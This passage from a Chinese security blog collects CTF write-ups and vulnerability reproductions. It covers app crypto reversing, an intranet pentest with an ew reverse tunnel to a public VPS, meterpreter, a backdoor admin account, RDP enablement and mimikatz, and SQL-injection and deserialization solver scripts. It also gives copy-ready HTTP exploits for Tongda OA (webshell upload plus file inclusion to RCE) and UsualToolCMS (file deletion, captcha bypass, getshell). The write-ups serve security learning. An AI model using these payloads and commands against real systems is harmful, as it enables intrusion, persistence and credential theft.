通过生成出的Session访问/admin路径，返回500为成功

接着进行文件读取获得flag

JEB_Debug_Encrypt

Sun, 09 May 2021 00:00:00 +0000

JEB 动态调试加密

工具

JEB3

BurpSuite

Genymotion

操作

先准备一个模拟器或安卓手机，配置好BurpSuite代理，可以抓取到如下数据包，Request和Response都已加密。

用Jeb3打开Apk，进入Bytecode菜单，点击下方的字符串，搜索dataStr双击进入。（为啥要搜索它? 因为它在提交数据中是个协议头, 添加这些参数的时候想必都会在一个代码块, 所以加密函数也可能在附近。）

进入后我们可以看到smali代码，在可疑的地方通过Ctrl+b可以下断点进行调试。

模拟器内需要先打开APP，然后点击上方虫子按钮，可以看到如下图所示，点击附上。

注意: 如果附加和调试对话框中没有模拟器的话, 你需要将模拟器目录下的adb.exe路径添加进系统环境变量path中, 如果已经添加却无法搜索到, 打开任务管理器结束adb.exe进程, 重启模拟器应该就可以了

在模拟器内点击登陆后，JEB模拟器右上方VM/局部变量会增加几个值，但是我们无法直接看懂。

我们需要修改Type类型，从int改为string，修改后我们可以看到变量当前处在内存中的值，F6可以进行单步调试，局部变量的值也会随之改变。

我们已经了解了如何进行断点调试，通过分析java代码看下整个的加密过程

dataStr是我们的加密字符串，先是调用了getEncodeJsonStr，双击进入看一下

arg6是我们传入的值，我们设置断点看一下

如下图可以看到v6是我们传入的数据进行了json转换，那么我们只要跟着v6走就能找到加密过程。

我们继续往下，v6传入了encodeMesJsonByPassword中，传入了4个值分别为Token，requestAesKey，v6，TERMINAL_TYPE

如下图Token是#@!1234567890!@#，requestAesKey是1234567890123456，v6是json格式的明文

TERMINAL_TYPE还不知道我们双击进去，是afAndriod

几个变量都知道了那我们双击进入encodeMesJsonByPassword函数，可以看到v2是一个随机的AesSecretKey，将等于过滤为空，先不管他。

如下图signature=md5(terminalType+token+timestamp)，terminalType=afAndriod、token=#@!1234567890!@#、timestamp为一个随机值，暂时无法构造。

继续往下看arg6，将&timestamp=xxx+&signature=xxx进行了一次base64，和上面的arg6一起进入encryptPinfo函数。上面的arg6为requestAesKey=1234567890123456

接着进入encryptPinfo函数，arg3=base64(&timestamp=xxx+&signature=xxx),arg4=1234567890123456,看下加密发现是AES/CBC/PKCS5Padding加密。

有了KEY，我们需要找到IV，点击进入IsIvParameter_Pinfo，如下图Iv值为0123456789abcdef

有了IV和KEY，还有加密算法我们需要对加密字符串进行解密，通过在线AES解密即可得到。

在进行一次base64，获得明文

CTF内网渗透题

Thu, 15 Oct 2020 00:00:00 +0000

记一次CTF内网渗透，据说是从护网复现过来的。

这是第一个flag。。。 既然我们知道这是wordpress正常套路那我们通过wpscan扫描一下

如下图发现存在xmlrpc.php，根据经验这个php存在用户密码爆破，那我们尝试一下参考：Wordpress xmlrpc.php -common vulnerabilites & how to exploit them

通过文章发布的地方知道存在一个power_admin的用户通过xmlrpc.php验证一下不知道为什么是不是我个人问题输入正确账号密码后没有直接给我跳转到wp-admin/index.php页面还是在原来页面。我只能通过替换cookie后直接访问。在媒体库内直接上传冰蝎一句话后访问正常操作之后通过冰蝎配合msf反弹shell

内网穿透我比较常用的手法是通过ew配合proxychains 如何通过EW做Socks5代理进行内网渗透 - 知乎 ew for linux下载地址：ew

首先在公网的vps上通过ew监听1080和1024 ./ew_for_linux64 -s rcsocks -l 1080 -e 1024 & 之后通过msf把ew客户端上传到靶机上

meterpreter > upload /root/ew/ew_for_linux64 /tmp/
[*] uploading  : /root/ew/ew_for_linux64 -> /tmp/
[*] uploaded   : /root/ew/ew_for_linux64 -> /tmp//ew_for_linux64
meterpreter > 
meterpreter > shell
Process 20657 created.
Channel 0 created.
cd /tmp
chmod 777 ew_for_linux64
./ew_for_linux64 -s rssocks -d 118.126.66.150 -e 1024

在配置一下本地kali的proxychains 编辑/etc/proxychains.conf,在最下面一行修改为公网vps的地址和端口正确配置后就可愉快的探索内网了，如下图通过proxychains nmap -sT 192.168.1.2 -Pn扫描1.2主机的端口，这里我就不扫描内网了可以通过msf的模块扫描，我这里直接通过webshell尝试ping邻居的IP来获取主机（注意icmp协议是无法通过proxychains传递的）。发现存在1433端口通过hydra爆破密码，我前面已经爆破过了所以知道密码是123456演示一下，hydra命令我就不解释了看下help文档就会了。通过proxychains msfconsole使用use auxiliary/admin/mssql/mssql_exec模块执行命令添加账户设置管理员，开启3389

net user 1111 abc.123 /add
net localgroup administrators 1111 /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

现在可以通过rdesktop直接访问上传神奇mimikz！！获取管理员密码

privilege::debug
sekurlsa::logonpasswords

还有一台主机通过密码flag3{xxxx}账号administrator直接远程桌面连接即可

2019神盾杯

Sun, 23 Aug 2020 00:00:00 +0000

首届“神盾杯”上海市网络安全竞赛，去年的比赛。

0x00 babyJS

操作内容：

查看源码找不到被调用的CheckLogin函数

看到script中有用到unespace和escape等函数用于编码字符串

将eval传参改为alert 显示为弹窗

发现check函数并将flag与用户输入做比较得到flag

FLAG值：

flag{a5a5f402f6dc62acd3e848900a17513f}

0x01 crypto_easy_1

操作内容：

下载文件

发现3行类似的数据并且长度一致。

:左边的长度为42 右边的长度为56 ，猜测右边被base64编码过进行解码比较长度

长度一致为42

异或运算一下可以得到Key随后将key代入与base64解码后的密文异或比较得到flag

解密脚本如下:

import base64
x = 'v6"wo5UIP9c4IdCk1o6qZhhB5DKZhVBwBzONl1JRIz:TwB2RyZYBCEVbjBjID17UkUeeDAwPBh1dg86AyAgcSQ4QygYGnAuJQYw'
y = 'zjS0ubQE2hw29FL2qs61ZNOVyFaf6IAjUZ7X8ijuVg:Q1wHADwPAC13PyRlUB90CwUCeHAwGj9hOg0QP34/cjkvY1AOTigOAhkt'
z = 'pJryZpVUNpSFi06WlKGkS0Uka6zw1sNCX"h2urQoyg:SXwmSRMdBz0LJwARAGkObhg6CSo5ZCVcIn0LLnkFfRAiGw9kAzM1GDYt'
a, b = x.split(':')
c, d = y.split(':')
e, f = z.split(':')
b = base64.b64decode(b)
d = base64.b64decode(d)
f = base64.b64decode(f)
g = base64.b64decode('X1o1VzIPaVgjbmNvCnQAC0ZHY3BbMUkaeylDYWVOCzZDXwJjR3hTFiw3')
flag = ''
for  i in range(42):
    t = ord(a[i]) ^ ord(b[i])
    flag += chr(ord(g[i]) ^ t)
print(flag)

FLAG值：

flag{b80f908c-8226-11e9-8b28-88e9fe5197ac}

0x02 ez_gallery_1

操作内容：

查看源码

提示flag位置

找到可以利用的url

使用?截断1.jpg

FLAG值：

flag{378346c7ac53d624a8621efc745bbeab}

0x03 fast_calc_2

操作内容：

随便试了几下{1+1},{set},发现有点奇怪,猜测可能是python逃逸

尝试dir(().__class__)

尝试了一下网上的payload但是没有成功，发现存在过滤，过滤了[]

查到builtins是自动引入环境的__builtins__.__dict__

查找资料通过pop绕过[]

Payload为：__builtins__.__dict__.pop('open')('/flag').readline()

FLAG值：

flag{4582900a19a6a8801399afb6a31d9bc0}

0x04 Easyadmin

操作内容：

爆破下目录发现index.php~存在源码

发现srole==admin才能输出flag

登陆的后发现token为base64加密，解一下

搜索了一下jwt发现有加密，网上有类似的解法

下面网站可以验证

https://jwt.io/

有根据源码把guest改为admin

再看下源码，里面有一个key我们不知道，猜测需要爆破应该为4位

在github上找到一个脚本直接跑出来了https://github.com/brendan-rius/c-jwt-cracker

保存下‘sjwt’

用这个新token替换一下成功获取flag

FLAG值：

flag{11529a36dd607c45e5b104ed977247ed}

0x05 Easyupload

操作内容：

通过尝试发现在图片地址处输入 file:///etc/passwd可以读到文件

然后在这卡了好久，在摸索后发现可以通过用/proc/self/cwd绕过，cwd是一个符号链接，指向了实际的工作目录

下图是一篇文章中的介绍

构造如下payload

获取到源码

找到他的命名规则

然后通过上传php webshell获取flag

先上传一个phpinfo

读到了文件但是没有执行

想到通过

<script language="php">phpinfo();</script>

成功执行

运行 system(cat /flag)

FLAG值：

flag{2742ab5468a78d70dca332ca48aa7b89}

0x06 Easysqli

操作内容：

首先登陆pow直接在cmd5上解密下就行

一开始尝试各种绕过都不行

后来提示了一波bypass addslashes

通过google搜索

格式化字符串漏洞

找到payload %1$'

1．两张 admin%1$'%20union%20select%201,2%23

查找表admin%1$'%20union%20select%20table_name,2%20from%20information_schema.tables%20where%20table_schema=database()%23

表名user

admin%1$'%20union%20select%20column_name,2%20from%20information_schema.columns%20where%20table_schema=database()%23

找到字段名

admin%1$'%20union%20select%20username,password%20from%20user%23

在password中找到flag

FLAG值：

flag{299386fb699cff0cb99b1f57dee500a0}

jsEncrypter 加密

Tue, 04 Aug 2020 11:24:30 +0800

burp 爆破 JS加密

首先右键登录按钮属性查看html源代码，发现id=‘rsa’

ctrl+shift+f 查找rsa描点，发现调用了strEnr

继续查找strEnr，并进入函数

对加密函数添加断点进行判断，发现123123账号密码进入了此处，且3个key分别为1，2，3。

我们直接控制台调用，尝试加密解密

保存des.js到本地

既然找到了加密解密函数现在就是通过burp调用函数使其加解密,修改phantomjs_server.js

载入server.js

burp连接server端口，test，我们现在已经可以成功加密了

配置burp intruder，添加变量

选择Custom ，1为用户

2为密码

添加payload加密

start attack，成功爆破

尝试解密下加密字符串，成功

豌豆杯入学CTF

Wed, 16 Oct 2019 00:00:00 +0000

1.题目:小可爱第一步肯定是绕过本地回环地址一开始想到的是x-forward-for等告诉服务器我的地址但发现没有绕过看题目题目是说来源地址想到了referer成功绕过这里没啥思路只能爆破密码为orange 访问到另外一个页面然后登录。发现是一张迪丽热巴的图片这个主管很喜欢迪丽热巴啊！！将图片下载下来，用binwalk查看下发现有压缩包!foremost下得到压缩包发现有密码这个地方解了很久发现使用Dilraba的md5。。。。得到一张图片再一次foremost得到一个压缩包成功拿到flag 2.题目:单身二十年

<?php 

header("Content-type:text/html;charset=utf-8"); 
show_source(__FILE__); 
if($_COOKIE['token']=='5D41402ABC4B2A76B9719D911017C592'){ 
    $file    =    'dump/'.md5(base64_encode(mt_rand(1,100))).'.txt'; 
    file_put_contents($file,file_get_contents('327A6C4304AD5938EAF0EFB6CC3E53DC.php')); 
    sleep(10); 
    unlink($file); 
}else{ 
    header('Location: index.php'); 
} 

setcookie("token"); 

?>

看懂源码发现访问页面会睡眠十秒他会把flag写入到一个1到100随机数字经过base64,md5的txt文件里。一种是用burp直接get到这里我就不演示了,我是直接写的python,访问下页面执行脚本就行了。

import base64
import hashlib
import requests
for i in range(1,101):
	headers = {'Content-type':'text/html;charset=utf-8'}
	encodestr = base64.b64encode(str(i).encode('utf-8'))
	cookies = {'token':'5D41402ABC4B2A76B9719D911017C592'}
	#print(encodestr)
	m = hashlib.md5()
	m.update(encodestr)
	#print(m.hexdigest())
	a = m.hexdigest()
	url = 'http://106.14.145.133:8081/web10/dump/'+a+'.txt'
	#print(url)
	url_get = requests.get(url,headers=headers,cookies=cookies,timeout=2)
	#print(url_get.headers)
	#print(url_get.cookies)
	if url_get.status_code == 200:
		print(url_get.text)

3.题目:初心不改访问页面发现是一个thinkphp5.0 一猜就是sql注入一开始以为是构造一个注入然后load_file到flag后来发现想多了，直接通过payload拿到mysql账号密码 /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 主页查看源码发现有一个phpmyadmin，登陆后成功拿到flag

web题我是全部AK掉了有些题目是通过exp直接拿到flag太简单了就不讲了。 Crypto题

1.题目:震惊，凯撒竟被4人关在一密室

凯撒被4个人关在一个密室里！
aCU3QjkxMjkxMTA3bjVnMTZoNjNjJTdEY2cwNDBoM2g4aTRlMDc3ZmYz

先是base64 然后url编码栅栏编码四组凯撒拿到flag

2.题目:粗心大意的主管已知密文为:925♥♥♥A2D74♥♥DDE4♥EBC0♥♥♥1D0E♥♥7 原文为:8E5♥♥C14DCD♥CDE8♥♥55F3738♥11DE7A。写个python就行了

# -*- coding: utf-8 -*-
import string
import hashlib
payloads = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'

for a in payloads:
    for b in payloads:
        for c in payloads:
        	for d in payloads:
        		for e in payloads:
        			for f in payloads:
			            s = "8E5"+a+d+"C14DCD"+b+"CDE8"+e+c+"55F3738"+f+"11DE7A"
			            tmp = hashlib.md5(s).hexdigest().upper()
			            if '925' in tmp and 'A2D74' in tmp and 'DDE4' in tmp and 'EBC0' in tmp:
			                print(s)
		               		print(tmp)

3.题目:畸形的凯撒密文：afZ_rCI[kA55#;ASc9*%$c

char="afZ_rCI[kA55#;ASc9*%$c"
i = 0
flag = ""
while i < len(char):
	num = ord(char[i])+(i+5)
	flag+=chr(num)
	i+=1
print(flag)

REVERSE

1.题目:机密文件用NET.Reflector Pro工具打开文件看到源代码发现是aes加密使用openssl解密或者用c#再写一个解密的 password也在里面

openssl aes-128-cbc -nosalt -d -in secret.636748579460890458.bin -iv 6b6a704853325367344c716637754e65 -K 6b6a704853325367344c716637754e65 -p

RedHat2021 CTF

Tue, 15 Oct 2019 22:00:38 +0800

线上赛

find_it

打开题目第一步肯定访问robots.txt，可以看到1ndexx.php 访问后发现返回500，没有其他思路，猜测存在vim文件泄漏，查看.1ndexx.php.swp可以看到源码查看代码可以看到是一个文件写入的程序，文件内容是可控的，文件后缀也是php，但是存在过滤，我们先写入一个phpinfo看一下搜索下flag没想到直接拿到了..

framework

打开题目是一个yii的框架直接下载备份文件www.zip,但是不知道为什么我一直下不下来。修改头部Range才成功下载。直接查看控制器，发现actionAbout存在反序列化漏洞，那直接用公开的yii pop链打就行了找到一个公开的链可以直接用，可能system被过滤了无法直接使用，通过assert绕过

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'phpinfo();';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

成功执行phpinfo但是查看了disable_functions存在过滤

既然存在过滤，先传一个一句话吧，代码执行通过file_put_contents直接写入shell 通过蚁剑插件直接绕过disable_functions,拿到flag

WebsiteManger

拿到题目查看源代码，可以看见image.php?id=2很可疑尝试异或注入，发现^1和^0的结果不一样说明存在注入过滤了空格但是ascii、mid、select都没过滤，直接构造payload /image.php?id=2^(ascii(mid((select/**/database())from(1)))>1) database()的第一位 ascii码大于1，语句肯定是成立的所以返回如下图片 database()的第一位 ascii码大于1000，语句肯定是不成立的所以返回如下图片根据如上判断直接编写脚本，<>为等于符号，判断只要返回长度大于190467即为正确之后依次构造查表，查字段即可，如下给出exp

import requests
import string,hashlib
url = 'http://'
sss = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890._'
#sss = string.digits + string.lowercase
a = ''
for i in range(1, 50):
    flag = 0
    for j in sss:
    	#print(j)
    	#payload = '/image.php?id=3^(ascii(mid((select/**/database())from(%s)))<>%s)' % (i, ord(j))
    	#payload = '/image.php?id=3^(ascii(mid((select/**/group_concat(SCHEMA_NAME)/**/from/**/information_schema.schemata)from(%s)))<>%s)' % (i, ord(j))
       	#payload = '/image.php?id=3^(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from(%s)))<>%s)' % (i, ord(j))#images,users

        #payload = '/image.php?id=3^(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x7573657273)from(%s)))<>%s)'%(i, ord(j))#username,password
        payload = '/image.php?id=3^(ascii(mid((select/**/group_concat(password)/**/from/**/users)from(%s)))<>%s)#'%(i, ord(j))
        res = requests.get(url+payload).text
    #    print(url+payload)
   #     print(len(res))
        if len(res) > 190467:
            a += j
            flag = 1
            print a
            break
    if flag == 0:
        break
 
print(a)

登陆成功后是一个curl页面存在ssrf，直接通过file:///flag即可

通达OA文件上传&文件包含导致RCE复现

Tue, 15 Oct 2019 22:00:38 +0800

漏洞复现

影响版本：

V11版
2017版
2016版
2015版
2013版
2013增强版

测试环境：

11.2.191129

漏洞复现：

通过 /ispirit/im/upload.php 页面，未授权文件上传一个一句话文件，可获得路径和文件名。

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.235.7
Content-Length: 656
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

/ispirit/interface/gateway.php 存在文件包含漏洞，包含刚刚所上传的文件（/general/../../attach/im/ 为默认路径，2012/969649651.jpg 为上图获得的文件名和目录名），包含文件从而执行命令。

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.235.7
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v73r3edjd8hk4n6vuiuv3itsp5; KEY_RANDOMDATA=2283
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

json={"url":"/general/../../attach/im/2012/969649651.jpg"}&cmd=dir

漏洞分析：

直接打开php源码头部，带有Zend关键字。

通过Zend在线解密php代码http://dezend.qiling.org/free/

查看第4行至13行，p参数不为空即可绕过身份验证。

如下图DEST_UID 参数不为0，即可进入inc/utility_file.php中的upload函数

如下图upload函数，会进入is_uploadable函数验证后缀是否为php

如下验证是否为php后缀，可通过php.绕过验证，但是默认不存储在wwwroot中，所以没用

构造文件上传poc，p不为空，upload_mode为2，DEST_UID不为0，文件名参数为ATTACHMENT

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.235.7
Content-Length: 656
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

/ispirit/interface/gateway.php 存在文件包含漏洞

p为空即可绕过身份认证，如下可知，可从json中获取url参数的值

如下38行需校验传递参数中是否包含general/、ispirit/、module/ ，如果包含url参数的值即可执行include_once，从而文件包含

如下图，成功成功文件包含并代码执行

网上有很多复现的文章，但是如果是为了学习的话最好还是自己通读一边代码。

Uscms代码审计

Thu, 18 Jul 2019 11:24:30 +0800

0x01 第一处：前台任意文件删除

漏洞信息：前台myup.php文件最后一段存在任意文件删除代码：

漏洞点：http://xxx/myup.php

第47行只对..做了过滤,我仍然能任意删除网站内的文件，直接构造poc,

Burp POC：

POST /UsualToolCMS/myup.php HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

get=delimg&imgurl=./1.php

0x02 绕过后台验证码爆破

漏洞点:http://xxx.xxx.xxx.xxx/cmsadmin/ 后台登陆时默认需要输入验证码，但是当我把验证码的参数ucode删除时，登陆依然成功

1.默认情况下登陆数据包

删除ucode参数和cookie后登陆，直接登陆成功

通过burp爆破后台密码

POST /UsualToolCMS/cmsadmin/a_login.php?do=login HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.235.242/UsualToolCMS/cmsadmin/a_login.php
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

uuser=admin&upass=admin

0x03 后台GETSHELL

漏洞点:http://xxx.xxx.xxx.xxx/cmsadmin/a_lang.php 13行未对$lg做判断

点击保存时抓包需要修改url处的lg参数这样就上传到跟目录了，再在post 参数的en后面加入en"},<?php phpinfo(); ?>

POST /UsualToolCMS/cmsadmin/a_langx.php?x=m&lg=../1.php HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.235.242/UsualToolCMS/cmsadmin/a_langx.php?lg=lg-en.json
Cookie: navleft=21; UTCMSLanguage=zh; PHPSESSID=1r5kk3jieflfbnseav3e5dnclo
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 9189

submit=%E4%BF%9D%E5%AD%98%E8%AF%AD%E8%A8%80%E5%8C%85&keys%5B%5D=language&values%5B%5D=en"},<?php phpinfo(); ?>&keys%5B%5D=charset&values%5B%5D=utf-8&keys%5B%5D=speak&values%5B%5D=English&keys%5B%5D=web&values%5B%5D=UsualToolCMS&key%5B%5D=index&value%5B%5D=Home&key%5B%5D=article&value%5B%5D=Article&key%5B%5D=product&value%5B%5D=Product&key%5B%5D=picture&value%5B%5D=Picture&key%5B%5D=atlas&value%5B%5D=Atlas&key%5B%5D=contact&value%5B%5D=Contact&key%5B%5D=about&value%5B%5D=About&key%5B%5D=forum&value%5B%5D=Forum&key%5B%5D=register&value%5B%5D=Register&key%5B%5D=login&value%5B%5D=Login&key%5B%5D=news&value%5B%5D=News&key%5B%5D=job&value%5B%5D=Job&key%5B%5D=wages&value%5B%5D=Wages&key%5B%5D=application&value%5B%5D=Application&key%5B%5D=resume&value%5B%5D=Resume&key%5B%5D=shopcart&value%5B%5D=Shopcart&key%5B%5D=account&value%5B%5D=Account&key%5B%5D=member&value%5B%5D=Member&key%5B%5D=up&value%5B%5D=Up&key%5B%5D=down&value%5B%5D=Down&key%5B%5D=more&value%5B%5D=More&key%5B%5D=new&value%5B%5D=New&key%5B%5D=authorize&value%5B%5D=Authorize&key%5B%5D=authenticating&value%5B%5D=Authenticating&key%5B%5D=qq&value%5B%5D=QQ&key%5B%5D=membercenter&value%5B%5D=Member&key%5B%5D=username&value%5B%5D=Username&key%5B%5D=password&value%5B%5D=Password&key%5B%5D=forgotpass&value%5B%5D=Forgot&key%5B%5D=search&value%5B%5D=Search&key%5B%5D=detail&value%5B%5D=Detail&key%5B%5D=size&value%5B%5D=Size&key%5B%5D=spec&value%5B%5D=Spec&key%5B%5D=color&value%5B%5D=Color&key%5B%5D=aboutus&value%5B%5D=About+Us&key%5B%5D=newgoods&value%5B%5D=New+Product&key%5B%5D=topgoods&value%5B%5D=Top+Product&key%5B%5D=link&value%5B%5D=Link&key%5B%5D=confirm&value%5B%5D=Confirm&key%5B%5D=email&value%5B%5D=Email&key%5B%5D=title&value%5B%5D=Title&key%5B%5D=content&value%5B%5D=Content&key%5B%5D=avatar&value%5B%5D=Avatar&key%5B%5D=sex&value%5B%5D=Sex&key%5B%5D=man&value%5B%5D=Man&key%5B%5D=woman&value%5B%5D=Woman&key%5B%5D=address&value%5B%5D=ADD.&key%5B%5D=tel&value%5B%5D=Tel&key%5B%5D=fax&value%5B%5D=Fax&key%5B%5D=introduction&value%5B%5D=Intro&key%5B%5D=validatecode&value%5B%5D=Captcha&key%5B%5D=changeit&value%5B%5D=Change+it&key%5B%5D=order&value%5B%5D=Order&key%5B%5D=writeorder&value%5B%5D=Write+Order&key%5B%5D=menu&value%5B%5D=Menu&key%5B%5D=balance&value%5B%5D=Balance&key%5B%5D=level&value%5B%5D=Level&key%5B%5D=writearticles&value%5B%5D=Write+Articles&key%5B%5D=articlemanagement&value%5B%5D=Article+Admin&key%5B%5D=articlebrowse&value%5B%5D=Article+Browse&key%5B%5D=writeonline&value%5B%5D=Add+New&key%5B%5D=payment&value%5B%5D=Payment&key%5B%5D=registrationtime&value%5B%5D=Reg+Time&key%5B%5D=lastlogintime&value%5B%5D=Last+Login&key%5B%5D=fullname&value%5B%5D=Full+Name&key%5B%5D=privileges%3Adiscount&value%5B%5D=Privileges%3ADiscount&key%5B%5D=state&value%5B%5D=State&key%5B%5D=source&value%5B%5D=Source&key%5B%5D=ordernumber&value%5B%5D=Order+No.&key%5B%5D=money&value%5B%5D=Money&key%5B%5D=time&value%5B%5D=Time&key%5B%5D=finish&value%5B%5D=Finish&key%5B%5D=unpaid&value%5B%5D=Unpaid&key%5B%5D=deliver&value%5B%5D=Deliver&key%5B%5D=refund&value%5B%5D=Refund&key%5B%5D=goods&value%5B%5D=Goods&key%5B%5D=charge&value%5B%5D=Charge&key%5B%5D=other&value%5B%5D=Other&key%5B%5D=ordertime&value%5B%5D=Order+Time&key%5B%5D=voucher&value%5B%5D=Voucher&key%5B%5D=customer&value%5B%5D=Customer&key%5B%5D=zipcode&value%5B%5D=Zip+Code&key%5B%5D=logistics&value%5B%5D=Logistics&key%5B%5D=logisticscompany&value%5B%5D=Company&key%5B%5D=logisticsnumber&value%5B%5D=Number&key%5B%5D=logisticsdetails&value%5B%5D=Details&key%5B%5D=paymentmethod&value%5B%5D=Method&key%5B%5D=alipay&value%5B%5D=Alipay&key%5B%5D=wechatpay&value%5B%5D=Tencent+Wechat&key%5B%5D=paypal&value%5B%5D=Paypal&key%5B%5D=waitinganswer&value%5B%5D=Waiting&key%5B%5D=answered&value%5B%5D=Answered&key%5B%5D=question&value%5B%5D=Question&key%5B%5D=reply&value%5B%5D=Reply&key%5B%5D=tencentaccount&value%5B%5D=Tencent&key%5B%5D=weiboaccount&value%5B%5D=Weibo&key%5B%5D=wechataccount&value%5B%5D=Wechat&key%5B%5D=binded&value%5B%5D=Binded&key%5B%5D=untie&value%5B%5D=Untie&key%5B%5D=quantity&value%5B%5D=Qty&key%5B%5D=parameter&value%5B%5D=Parm&key%5B%5D=total&value%5B%5D=Total&key%5B%5D=submit&value%5B%5D=Submit&key%5B%5D=delete&value%5B%5D=Del&key%5B%5D=unit&value%5B%5D=USD&key%5B%5D=actual&value%5B%5D=Actual&key%5B%5D=feedback&value%5B%5D=Feedback&key%5B%5D=otheraccount&value%5B%5D=Other+Accounts&key%5B%5D=out&value%5B%5D=Out&key%5B%5D=ranking&value%5B%5D=Ranking&key%5B%5D=recommend&value%5B%5D=Recommend&key%5B%5D=tag&value%5B%5D=Tag&key%5B%5D=tags&value%5B%5D=Tags&key%5B%5D=read&value%5B%5D=Read&key%5B%5D=productdetails&value%5B%5D=Product+Details&key%5B%5D=service&value%5B%5D=Service&key%5B%5D=category&value%5B%5D=Category&key%5B%5D=allcategory&value%5B%5D=All+Category&key%5B%5D=stock&value%5B%5D=Stock&key%5B%5D=price&value%5B%5D=Price&key%5B%5D=sale&value%5B%5D=Sale&key%5B%5D=loginview&value%5B%5D=Login+View&key%5B%5D=readme&value%5B%5D=Read+Me&key%5B%5D=popularity&value%5B%5D=Popularity&key%5B%5D=details&value%5B%5D=Details&key%5B%5D=message&value%5B%5D=Message&key%5B%5D=original&value%5B%5D=Original&key%5B%5D=author&value%5B%5D=Author&key%5B%5D=pass&value%5B%5D=Pass&key%5B%5D=audit&value%5B%5D=Audit&